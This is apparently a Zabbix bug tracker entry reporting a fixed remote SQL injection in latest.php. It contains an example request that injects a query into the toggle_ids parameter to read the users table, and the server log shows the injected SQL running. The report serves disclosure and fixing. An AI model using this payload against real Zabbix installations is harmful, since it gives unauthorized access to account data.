Loading...

XML

Word

Printable

Type: Problem report
Resolution: Fixed
Priority: Blocker
Fix Version/s: 2.2.14rc1, 3.0.4rc1, 3.2.0alpha1
Affects Version/s: 2.2.13, 3.0.3
Component/s: None
Labels:
- vulnerability

Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.

For example:
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1

Result

SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 ? require_once() ? CProfile::flush() ? CProfile::insertDB() ? DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185

depends on

ZBX-12951 Microsoft Windows MHTML Cross Site Scripting Vulnerabilities

Elaborating

is duplicated by

ZBX-11138 Syntax error logged in systemlog by PostgreSQL

Closed

Assignee:: Unassigned

Reporter:: Alexander Vladishev

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Created:: 2016 Jul 22 12:47

Updated:: 2019 Mar 28 11:40

Resolved:: 2016 Jul 22 15:48

Details

Description

Attachments

Issue Links

Activity

People

Dates